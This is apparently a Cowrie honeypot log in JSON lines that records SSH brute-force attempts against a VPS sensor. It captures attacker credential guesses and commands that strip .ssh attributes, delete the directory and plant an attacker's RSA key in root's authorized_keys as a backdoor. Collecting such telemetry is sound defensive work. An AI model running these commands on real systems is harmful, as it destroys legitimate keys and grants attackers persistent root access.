{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:13:59.893021Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:13:59.894106Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.034777Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:14:00.332332Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.333108Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.474443Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.475460Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":55342,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b4d88902d76","protocol":"ssh","message":"New connection: 158.51.124.56:55342 (1.2.3.4:22) [session: 0b4d88902d76]","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.611920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.612636Z","src_ip":"158.51.124.56","session":"0b4d88902d76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:14:00.751103Z","src_ip":"158.51.124.56","session":"0b4d88902d76"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:14:01.348508Z","src_ip":"158.51.124.56","session":"0b4d88902d76"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:14:02.489969Z","src_ip":"158.51.124.56","session":"0b4d88902d76"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":56442,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9bd8bb3aef2","protocol":"ssh","message":"New connection: 158.51.124.56:56442 (1.2.3.4:22) [session: b9bd8bb3aef2]","sensor":"my-vps","timestamp":"2025-09-08T15:14:02.627289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:14:02.628015Z","src_ip":"158.51.124.56","session":"b9bd8bb3aef2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:14:02.766227Z","src_ip":"158.51.124.56","session":"b9bd8bb3aef2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:14:03.358963Z","src_ip":"158.51.124.56","session":"b9bd8bb3aef2"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:14:03.498318Z","src_ip":"158.51.124.56","session":"976f536a9374"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:14:03.499226Z","src_ip":"158.51.124.56","session":"b9bd8bb3aef2"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":55804,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4c0d041e8b8","protocol":"ssh","message":"New connection: 185.255.91.51:55804 (1.2.3.4:22) [session: c4c0d041e8b8]","sensor":"my-vps","timestamp":"2025-09-08T15:14:33.745606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:14:33.746451Z","src_ip":"185.255.91.51","session":"c4c0d041e8b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:14:33.843681Z","src_ip":"185.255.91.51","session":"c4c0d041e8b8"}
{"eventid":"cowrie.login.failed","username":"sqldba","password":"sqldba@123","message":"login attempt [sqldba/sqldba@123] failed","sensor":"my-vps","timestamp":"2025-09-08T15:14:34.279022Z","src_ip":"185.255.91.51","session":"c4c0d041e8b8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:14:35.378028Z","src_ip":"185.255.91.51","session":"c4c0d041e8b8"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":52382,"dst_ip":"1.2.3.4","dst_port":22,"session":"464adcd5c200","protocol":"ssh","message":"New connection: 158.51.124.56:52382 (1.2.3.4:22) [session: 464adcd5c200]","sensor":"my-vps","timestamp":"2025-09-08T15:14:59.941331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:14:59.942174Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:15:00.081144Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.login.success","username":"root","password":"iddqdidkfa","message":"login attempt [root/iddqdidkfa] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:15:00.675704Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:15:01.004121Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.004837Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.006979Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.146579Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:15:01.447563Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.448623Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.590300Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.591836Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":53030,"dst_ip":"1.2.3.4","dst_port":22,"session":"86b9e2a4593a","protocol":"ssh","message":"New connection: 158.51.124.56:53030 (1.2.3.4:22) [session: 86b9e2a4593a]","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.729248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.730079Z","src_ip":"158.51.124.56","session":"86b9e2a4593a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:15:01.869893Z","src_ip":"158.51.124.56","session":"86b9e2a4593a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:15:02.470049Z","src_ip":"158.51.124.56","session":"86b9e2a4593a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:03.611519Z","src_ip":"158.51.124.56","session":"86b9e2a4593a"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":54020,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c2160ed8469","protocol":"ssh","message":"New connection: 158.51.124.56:54020 (1.2.3.4:22) [session: 7c2160ed8469]","sensor":"my-vps","timestamp":"2025-09-08T15:15:03.749240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:15:03.750157Z","src_ip":"158.51.124.56","session":"7c2160ed8469"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:15:03.888649Z","src_ip":"158.51.124.56","session":"7c2160ed8469"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:15:04.484390Z","src_ip":"158.51.124.56","session":"7c2160ed8469"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:04.624570Z","src_ip":"158.51.124.56","session":"464adcd5c200"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:04.625655Z","src_ip":"158.51.124.56","session":"7c2160ed8469"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52238,"dst_ip":"1.2.3.4","dst_port":22,"session":"4542454c60c3","protocol":"ssh","message":"New connection: 217.72.205.35:52238 (1.2.3.4:22) [session: 4542454c60c3]","sensor":"my-vps","timestamp":"2025-09-08T15:15:26.697474Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:26.699023Z","src_ip":"217.72.205.35","session":"4542454c60c3"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":57018,"dst_ip":"1.2.3.4","dst_port":22,"session":"5730c7236eeb","protocol":"ssh","message":"New connection: 185.255.91.51:57018 (1.2.3.4:22) [session: 5730c7236eeb]","sensor":"my-vps","timestamp":"2025-09-08T15:15:41.325132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:15:41.335338Z","src_ip":"185.255.91.51","session":"5730c7236eeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:15:41.434329Z","src_ip":"185.255.91.51","session":"5730c7236eeb"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"2025","message":"login attempt [ftptest/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T15:15:41.836892Z","src_ip":"185.255.91.51","session":"5730c7236eeb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:15:42.939868Z","src_ip":"185.255.91.51","session":"5730c7236eeb"}
{"eventid":"cowrie.session.connect","src_ip":"41.43.102.98","src_port":51730,"dst_ip":"1.2.3.4","dst_port":23,"session":"e25362194c9a","protocol":"telnet","message":"New connection: 41.43.102.98:51730 (1.2.3.4:23) [session: e25362194c9a]","sensor":"my-vps","timestamp":"2025-09-08T15:15:51.308228Z"}
